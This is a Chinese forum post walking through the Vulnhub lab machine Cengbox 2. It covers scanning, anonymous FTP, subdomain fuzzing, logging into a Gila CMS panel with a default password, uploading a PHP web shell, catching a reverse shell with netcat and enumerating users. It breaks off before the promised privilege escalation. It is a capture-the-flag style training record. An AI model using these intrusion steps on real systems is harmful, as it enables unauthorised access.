ToB企服应用市场:ToB评测及商务社交产业平台
标题:
Vulnhub之Cengbox 2靶机详细测试过程(利用不同的方法提权)
[打印本页]
作者:
风雨同行
时间:
2023-6-23 16:44
标题:
Vulnhub之Cengbox 2靶机详细测试过程(利用不同的方法提权)
Cengbox 2
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:03 1 60 Unknown vendor
192.168.56.100 08:00:27:ea:c7:5b 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:ee:62:de 1 60 PCS Systemtechnik GmbH
复制代码
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-22 20:09 EDT
Nmap scan report for localhost (192.168.56.254)
Host is up (0.00013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.253
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 209 May 23 2020 note.txt
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:99:9d:e0:bc:07:3c:4f:53:e5:bc:27:35:80:e4:9e (RSA)
| 256 fe:60:a1:10:90:98:8e:b0:82:02:3b:40:bc:df:66:f1 (ECDSA)
|_ 256 3a:c3:a0:e7:bd:20:ca:1e:71:d4:3c:12:23:af:6a:c3 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site Maintenance
MAC Address: 08:00:27:EE:62:DE (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
复制代码
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 (vsFTPd 3.0.3)
Name (192.168.56.254:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||56112|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 119 4096 May 23 2020 .
drwxr-xr-x 2 0 119 4096 May 23 2020 ..
-rw-r--r-- 1 0 0 209 May 23 2020 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||5618|)
150 Opening BINARY mode data connection for note.txt (209 bytes).
100% |****************************************************************************************************************| 209 488.28 KiB/s 00:00 ETA
226 Transfer complete.
复制代码
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ cat note.txt
Hey Kevin,
I just set up your panel and used default password. Please change them before any hack.
I try to move site to new domain which name is ceng-company.vm and also I created a new area for you.
Aaron
复制代码
域名:ceng-company.vm
可能的用户名: kevin, aaron
其他:kevin可能密码比较弱
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ curl http://192.168.56.254
<!doctype html>
<title>Site Maintenance</title>
<article>
<h1>Site Maintenance</h1>
<p>Sorry, We don't serve yet. You can check later the site. Regards </p> <p>— Ceng Company Team</p>
</article>
复制代码
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.254 ceng-company.vm
复制代码
但是访问域名ceng-company.vm,返回页面内容没有发生变化
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ gobuster dir -u http://ceng-company.vm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://ceng-company.vm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,txt,js,sh
[+] Timeout: 10s
===============================================================
2023/06/22 20:17:02 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 555]
/.html (Status: 403) [Size: 295]
/.php (Status: 403) [Size: 294]
/.html (Status: 403) [Size: 295]
/.php (Status: 403) [Size: 294]
/server-status (Status: 403) [Size: 303]
Progress: 1320683 / 1323366 (99.80%)
复制代码
目录扫描没有啥收获,是否存在子域名?
─(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ wfuzz -c -u 'ceng-company.vm' -H 'Host:FUZZ.ceng-company.vm' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 76=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 400 12 L 53 W 422 Ch "# directory-list-2.3-medium.txt"
000000003: 400 12 L 53 W 422 Ch "# Copyright 2007 James Fisher"
000000007: 400 12 L 53 W 422 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000013: 400 12 L 53 W 422 Ch "#"
000000011: 400 12 L 53 W 422 Ch "# Priority ordered case sensative list, where entries were found"
000000010: 400 12 L 53 W 422 Ch "#"
000000009: 400 12 L 53 W 422 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000012: 400 12 L 53 W 422 Ch "# on atleast 2 different hosts"
000000006: 400 12 L 53 W 422 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000005: 400 12 L 53 W 422 Ch "# This work is licensed under the Creative Commons"
000000008: 400 12 L 53 W 422 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000002: 400 12 L 53 W 422 Ch "#"
000000004: 400 12 L 53 W 422 Ch "#"
000000259: 403 11 L 32 W 296 Ch "admin"
复制代码
发现admin子域名返回状态码为403
将该子域名加入到/etc/hosts文件:
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.254 ceng-company.vm
192.168.56.254 admin.ceng-company.vm
复制代码
<img alt="" loading="lazy">
访问admin.ceng-company.vm返回“Forbidden",是否应该扫描一下目录:
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ gobuster dir -u http://admin.ceng-company.vm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak,.sh,.js
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://admin.ceng-company.vm/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: js,php,html,txt,bak,sh
[+] Timeout: 10s
===============================================================
2023/06/22 20:31:01 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 301]
/.php (Status: 403) [Size: 300]
/.html (Status: 403) [Size: 301]
/.php (Status: 403) [Size: 300]
/server-status (Status: 403) [Size: 309]
/gila (Status: 301) [Size: 329] [--> http://admin.ceng-company.vm/gila/]
复制代码
──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ gobuster dir -u http://admin.ceng-company.vm/gila/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak,.sh,.js
===============================================================
复制代码
终于找到了登录的入口
尝试用户名为kevin@ceng-company.vm, 密码为admin
上传shell.php,发现被保存在assets目录下
访问下面的url:
http://admin.ceng-company.vm/gila/assets/shell.php
复制代码
成功得到了shell
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.253] from (UNKNOWN) [192.168.56.254] 40688
Linux cengbox 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
17:39:51 up 34 min, 0 users, load average: 1.04, 4.65, 3.25
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cengbox:/$ cd /home
cd /home
www-data@cengbox:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K May 23 2020 .
drwxr-xr-x 23 root root 4.0K May 23 2020 ..
drwxr-x--- 4 mitnick developers 4.0K May 25 2020 mitnick
drwxr-xr-x 4 swartz swartz 4.0K May 26 2020 swartz
www-data@cengbox:/home$ cd mitnick
cd mitnick
bash: cd: mitnick: Permission denied
www-data@cengbox:/home$ cd swartz
cd swartz
www-data@cengbox:/home/swartz$ ls -alh
ls -alh
total 44K
drwxr-xr-x 4 swartz swartz 4.0K May 26 2020 .
drwxr-xr-x 4 root root 4.0K May 23 2020 ..
-rw------- 1 swartz swartz 1 May 26 2020 .bash_history
-rw-r--r-- 1 swartz swartz 220 Aug 31 2015 .bash_logout
-rw-r--r-- 1 swartz swartz 3.7K Aug 31 2015 .bashrc
drwx------ 2 swartz swartz 4.0K May 23 2020 .cache
drwx------ 2 swartz developers 4.0K May 26 2020 .gnupg
-rw------- 1 swartz developers 1 May 26 2020 .php_history
-rw-r--r-- 1 swartz swartz 655 May 16 2017 .profile
-rw------- 1 swartz developers 1 May 26 2020 .viminfo
-rwxr-xr-x 1 swartz swartz 20 May 26 2020 runphp.sh
www-data@cengbox:/home/swartz$ cat runphp.sh
cat runphp.sh
#!/bin/bash
php -a
www-data@cengbox:/home/swartz$
复制代码
[code]www-data@cengbox:/var/www/admin/gila$ cat config.phpcat config.php
欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)
Powered by Discuz! X3.4